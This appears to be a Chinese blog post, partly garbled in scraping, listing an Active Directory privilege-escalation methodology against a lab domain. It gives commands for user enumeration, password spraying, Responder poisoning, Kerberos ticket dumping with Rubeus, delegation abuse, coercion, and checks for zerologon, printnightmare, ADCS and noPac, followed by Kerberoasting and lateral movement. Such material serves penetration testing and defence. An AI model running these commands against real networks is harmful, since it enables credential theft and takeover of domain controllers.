时间:2025-07-17 10:11
人气:
作者:admin
来说是非者,便是是非人。
域提权与 Windows 提权的不同之处在于:Windows 提权的前提是 必须先获得目标机器的立足点(即 Shell),然后再枚举机器自身弱点,最终获得机器的本地 SYSTEM 或管理员权限;而域提权则 可以是在获得任意域主机立足点的情况下进行、也可以是在获得任意普通域用户凭证但无法登录域主机的情况下进行,然后再枚举域环境的弱点,最终获得域控机器的本地 SYSTEM 或域管理员权限。
nmap --script='smb-vuln-*' -p 445 192.168.56.0/24 或 nxc smb 192.168.56.0/24 -M ms17-010】impacket-lookupsid skylark.com/guest@192.168.56.50 或 enum4linux-ng -A -u "" -p "" 192.168.56.50 或 ./kerbrute_linux_386 userenum -d skylark.com --dc 192.168.56.50 user.txt】python kerbrute.py -domain skylark.com -user user.txt -dc-ip 192.168.56.50】nxc smb 192.168.56.50 -u user.txt -p pass.txt -d skylark.com --continue-on-success | grep + 、命令 2:nxc smb 192.168.56.50 -u user.txt -p pass.txt -d skylark.com --no-bruteforce --continue-on-success | grep +】responder -I eth0】注:若经过以上 RCE 漏洞中的步骤最终获得了立足点,而为了可以供一些工具远程使用该用户的权限,则可以使用 rubeus.exe 导出域主机上当前用户的 TGT 票据。
Rubeus.exe tgtdeleg /nowrap >ticket.txt
impacket-findDelegation skylark.com/user:'password@123' -dc-ip 192.168.56.50】【更多参考】impacket-rbcd skylark.com/user:'password@123' -dc-ip 192.168.56.50 -action read -delegate-to DC2012$】【更多参考】nxc smb 192.168.56.51 -u user -p 'password@123' -d skylark.com -M coerce_plus 和 nxc smb 192.168.56.51 -u user -p 'password@123' -d skylark.com -M remove-mic】nxc smb 192.168.56.50 -M zerologon】【更多参考】nxc smb 192.168.56.50 -u 'user' -p 'password@123' -d skylark.com-M printnightmare 检测法很有效,impacket-rpcdump 192.168.56.50 | egrep 'MS-RPRN|MS-PAR' 检测法似乎不是很准确。】【更多参考】nxc ldap 192.168.56.50 -u 'user' -p 'password@123' -d skylark.com-M adcs】【更多参考】nxc smb -u 'user' -p 'password@123' -d skylark.com 192.168.56.50 -M nopac】【更多参考】注:域提权漏洞并不总是支持远程(凭证、票据)提权,这时候就只能在获得立足点的环境(shell)下进行利用了。
在一系列域提权操作不成功之后,还可以借助一些技巧进行横向移动,以期望能发现一些惊喜。
impacket-GetUserSPNs skylark.com/user:'password@123' -dc-ip 192.168.56.50】【更多参考】nxc smb 192.168.56.0/24 -u 'user' -p 'password@123' -d skylark.com | grep Pwn】在完全控制了域控机器之后,可以采取以下措施来维持对 DC 机器的持续访问控制。
注意:BloodHound CE 版本的采集器和 Legacy 版本的采集器不通用,查询语法规则亦如此。